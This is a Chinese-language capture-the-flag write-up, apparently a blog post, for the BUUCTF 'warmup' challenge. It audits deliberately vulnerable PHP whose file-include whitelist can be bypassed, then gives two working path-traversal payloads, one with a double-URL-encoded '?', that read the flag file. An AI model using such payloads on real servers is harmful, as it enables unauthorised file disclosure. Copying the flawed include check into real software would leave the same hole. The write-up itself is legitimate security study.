题目:warmup
题目来源:buuctf
分析过程:
1. 首先ctrl + u 查看源代码,我们发现有一个source.php文件
2. 我们打开source.php文件,是一段代码,这道题要我们代码审计。
3. 与source文件相似的hint.php文件我们也打开看一下,它说flag在ffffllllaaaagggg中。
4. 然后回来source.php看这段代码,通过上网查询关于php的函数的用法。然后审计代码得出,其中有两个解法,如果if函数成立(也就是(白名单)?file=(白名单)?)我们就会得到它包含在里面的文件{file}。
php
<?php
highlight_file(__FILE__);
class emmm
{
public static function checkFile(&$page)//这里定义了一个checkFire函数
{
$whitelist = ["source"=>"source.php","hint"=>"hint.php"];//白名单
if (! isset($page) || !is_string($page)) {//判断格式与是否是字符类型
echo "you can't see it";
return false;
}
if (in_array($page, $whitelist)) {
return true;
}
$_page = mb_substr(
$page,
0,
mb_strpos($page . '?', '?')//截取问号前的字符串
);
if (in_array($_page, $whitelist)) {//判断是不是白名单上的
return true;
}
$_page = urldecode($page);//如果不成立则执行该代码块
$_page = mb_substr(
$_page,
0,
mb_strpos($_page . '?', '?')//这里对‘?’二次URL解码
);
if (in_array($_page, $whitelist)) {
return true;
}
echo "you can't see it";
return false;
}
}
if (! empty($_REQUEST['file'])//检查变量是否为空
&& is_string($_REQUEST['file'])//判断是否为字符串
&& emmm::checkFile($_REQUEST['file'])//调用checkFile函数————————>需要函数返回一个true;
) {
include $_REQUEST['file'];//这里包含一个文件 盲猜里面有flag
exit;
} else {
echo "<br><img src=\"https://i.loli.net/2018/11/01/5bdb0d93dc794.jpg\" />";
} (php代码、函数看不懂就上网搜)
我们键入source.php?file=hint.php?ffffllllaaaagggg
这里我们看不到那个表情包图片,说明我们键入的source.php?file=hint.php?ffffllllaaaagggg———满足条件
5. 由于我们不知道它的目录,所以用../返回(5次),打开ffffllllaaaagggg文件
source.php?file=hint.php?../../../../../ffffllllaaaagggg
就看到有flag啦
这里我们看不到那个图片,说明我们键入的source.php?file=hint.php?ffffllllaaaagggg———满足条件
第二种方式就是将将‘?’进行url二次编码,因为林澜起会对'?'解码一次,代码函数也会解码一次。所以要编码两次。
将问号改成 %253F%0A
也就是键入
source.php?file=hint.php%253F%0A../../../../../ffffllllaaaagggg 
也会成功。但是至于为什么其他字符跟第一个?不会解码也不懂。
知识点总结:代码审计,要会一点点php语法,看到不懂的就上网搜
完成时间: 
1634
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
